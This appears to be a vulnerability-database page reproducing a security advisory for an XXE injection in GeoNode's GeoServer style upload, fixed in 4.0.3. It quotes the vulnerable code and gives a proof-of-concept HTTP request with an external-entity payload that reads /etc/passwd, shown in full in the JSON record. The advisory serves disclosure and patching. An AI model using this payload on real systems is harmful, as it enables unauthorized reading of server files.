GHSA-mcmc-c59m-pqq8
Vulnerability from github
Published
2024-08-30 18:50
Modified
2024-11-18 16:27
Severity ?
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
7.1 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Summary
GeoServer style upload functionality vulnerable to XML External Entity (XXE) injection
Details

Summary

GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read.

Details

GeoNode's GeoServer has the ability to upload new styles for datasets through the dataset_style_upload view.

```py

https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/views.py#L158-L159

@login_required def dataset_style_upload(request, layername): def respond(args, kw): kw['content_type'] = 'text/html' return json_response(args, **kw) ... sld = request.FILES['sld'].read() # 1 sld_name = None try: # Check SLD is valid ... sld_name = extract_name_from_sld(gs_catalog, sld, sld_file=request.FILES['sld']) # 2 except Exception as e: respond(errors=f"The uploaded SLD file is not valid XML: {e}") name = data.get('name') or sld_name set_dataset_style(layer, data.get('title') or name, sld) return respond( body={ 'success': True, 'style': data.get('title') or name, # 3 'updated': data['update']}) ```

dataset_style_upload gets a user-provided file (1), pass it to extract_name_from_sld to extract an element from it (2) and return the former in the response (3).

```py

https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/helpers.py#L233-L234

def extract_name_from_sld(gs_catalog, sld, sld_file=None): try: if sld: if isfile(sld): with open(sld, "rb") as sld_file: sld = sld_file.read() # 1 if isinstance(sld, str): sld = sld.encode('utf-8') dom = etree.XML(sld) # 2 ... named_dataset = dom.findall( "{http://www.opengis.net/sld}NamedLayer") el = None if named_dataset and len(named_dataset) > 0: user_style = named_dataset[0].findall("{http://www.opengis.net/sld}UserStyle") if user_style and len(user_style) > 0: el = user_style[0].findall("{http://www.opengis.net/sld}Name") # 3 ... return el[0].text # 4 ```

extract_name_from_sld uses sld (which is a path to the provided file), reads it (1) and parses it with etree.XML in 2. Since the former uses a default XMLParser, the parsing gets done with the resolve_entities flag set to True. Therefore, dom handles the parsed XML containing the resolved entity (2), gets NamedLayer.UserStyle.Name in 3 and returns the resolved content in 4.

PoC

  1. Create a guest/non-privileged account and log in.
  2. Upload a dataset through /catalogue/#/upload/dataset whose name we will be referencing as <DATASET_NAME>.
  3. Send the following request that will try to upload a new style for the dataset. The response will be returning the resolved entity with the contents of /etc/passwd:

``` POST /gs/geonode:/style/upload HTTP/1.1 Host: localhost Cookie: django_language=en-us; csrftoken=; sessionid= X-Csrftoken: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoo Content-Length: 485 ------WebKitFormBoundaryfoo Content-Disposition: form-data; name="layerid" 1 ------WebKitFormBoundaryfoo Content-Disposition: form-data; name="sld"; filename="foo.sld" Content-Type: application/octet-stream

]> &ent; ------WebKitFormBoundaryfoo-- ```

Sample response:

HTTP/1.1 200 OK Server: nginx/1.23.2 ... {"success": true, "style": "root:x:0:0:root:/root:/bin/bash...", "updated": false}

Impact

This issue may lead to authenticated Arbitrary File Read.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "GeoNode"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26043"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-30T18:50:00Z",
    "nvd_published_at": "2023-02-27T21:15:12Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nGeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read.\n\n### Details\nGeoNode\u0027s GeoServer has the ability to upload new styles for datasets through the [`dataset_style_upload` view](https://github.com/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/urls.py#L70-L72).\n\n```py\n# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/views.py#L158-L159\n@login_required\ndef dataset_style_upload(request, layername):\n    def respond(*args, **kw):\n        kw[\u0027content_type\u0027] = \u0027text/html\u0027\n        return json_response(*args, **kw)\n    ...\n    sld = request.FILES[\u0027sld\u0027].read() # 1\n    sld_name = None\n    try:\n        # Check SLD is valid\n        ...\n        sld_name = extract_name_from_sld(gs_catalog, sld, sld_file=request.FILES[\u0027sld\u0027]) # 2\n    except Exception as e:\n        respond(errors=f\"The uploaded SLD file is not valid XML: {e}\")\n    name = data.get(\u0027name\u0027) or sld_name\n    set_dataset_style(layer, data.get(\u0027title\u0027) or name, sld)\n    return respond(\n        body={\n            \u0027success\u0027: True,\n            \u0027style\u0027: data.get(\u0027title\u0027) or name, # 3\n            \u0027updated\u0027: data[\u0027update\u0027]})\n```\n\n`dataset_style_upload` gets a user-provided file (`1`), pass it to `extract_name_from_sld` to extract an element from it (`2`) and return the former in the response (`3`).\n\n```py\n# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/helpers.py#L233-L234\ndef extract_name_from_sld(gs_catalog, sld, sld_file=None):\n    try:\n        if sld:\n            if isfile(sld):\n                with open(sld, \"rb\") as sld_file:\n                    sld = sld_file.read() # 1\n            if isinstance(sld, str):\n                sld = sld.encode(\u0027utf-8\u0027)\n            dom = etree.XML(sld) # 2\n        ...\n    named_dataset = dom.findall(\n        \"{http://www.opengis.net/sld}NamedLayer\")\n    el = None\n    if named_dataset and len(named_dataset) \u003e 0:\n        user_style = named_dataset[0].findall(\"{http://www.opengis.net/sld}UserStyle\")\n        if user_style and len(user_style) \u003e 0:\n            el = user_style[0].findall(\"{http://www.opengis.net/sld}Name\") # 3\n    ...\n    return el[0].text # 4\n```\n\n`extract_name_from_sld` uses `sld` (which is a path to the provided file), reads it (`1`) and parses it with [`etree.XML`](https://github.com/python/cpython/blob/22d91c16bb03c3d87f53b5fee10325b876262a78/Lib/xml/etree/ElementTree.py#L1312) in `2`. Since the former uses a [default XMLParser](https://github.com/python/cpython/blob/22d91c16bb03c3d87f53b5fee10325b876262a78/Lib/xml/etree/ElementTree.py#L1323-L1324), the parsing gets done with the [`resolve_entities` flag set to `True`](https://lxml.de/api/lxml.etree.XMLParser-class.html#:~:text=resolve_entities%3DTrue). Therefore, `dom` handles the parsed XML containing the resolved entity (`2`), gets `NamedLayer.UserStyle.Name` in `3` and returns the resolved content in `4`.\n\n### PoC\n1. Create a guest/non-privileged account and log in.\n1. Upload a dataset through `/catalogue/#/upload/dataset` whose name we will be referencing as `\u003cDATASET_NAME\u003e`.\n1. Send the following request that will try to upload a new style for the dataset. The response will be returning the resolved entity with the contents of `/etc/passwd`:\n\n```\nPOST /gs/geonode:\u003cDATASET_NAME\u003e/style/upload HTTP/1.1\nHost: localhost\nCookie: django_language=en-us; csrftoken=\u003cCSRF-TOKEN\u003e; sessionid=\u003cSESSION-COOKIE\u003e\nX-Csrftoken: \u003cCSRF-TOKEN\u003e\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoo\nContent-Length: 485\n------WebKitFormBoundaryfoo\nContent-Disposition: form-data; name=\"layerid\"\n1\n------WebKitFormBoundaryfoo\nContent-Disposition: form-data; name=\"sld\"; filename=\"foo.sld\"\nContent-Type: application/octet-stream\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n\u003c!DOCTYPE foo [ \u003c!ENTITY ent SYSTEM \"/etc/passwd\" \u003e ]\u003e\n\u003cfoo xmlns=\"http://www.opengis.net/sld\"\u003e\n  \u003cNamedLayer\u003e\n    \u003cUserStyle\u003e\n    \t\u003cName\u003e\u0026ent;\u003c/Name\u003e\n    \u003c/UserStyle\u003e\n  \u003c/NamedLayer\u003e\n\u003c/foo\u003e\n------WebKitFormBoundaryfoo--\n```\n\nSample response:\n\n```\nHTTP/1.1 200 OK\nServer: nginx/1.23.2\n...\n{\"success\": true, \"style\": \"root:x:0:0:root:/root:/bin/bash...\", \"updated\": false}\n```\n\n\n### Impact\nThis issue may lead to authenticated `Arbitrary File Read`.\n",
  "id": "GHSA-mcmc-c59m-pqq8",
  "modified": "2024-11-18T16:27:08Z",
  "published": "2024-08-30T18:50:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26043"
    },
    {
      "type": "WEB",
      "url": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/GeoNode/geonode"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/geonode/PYSEC-2023-15.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "GeoServer style upload functionality vulnerable to XML External Entity (XXE) injection"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.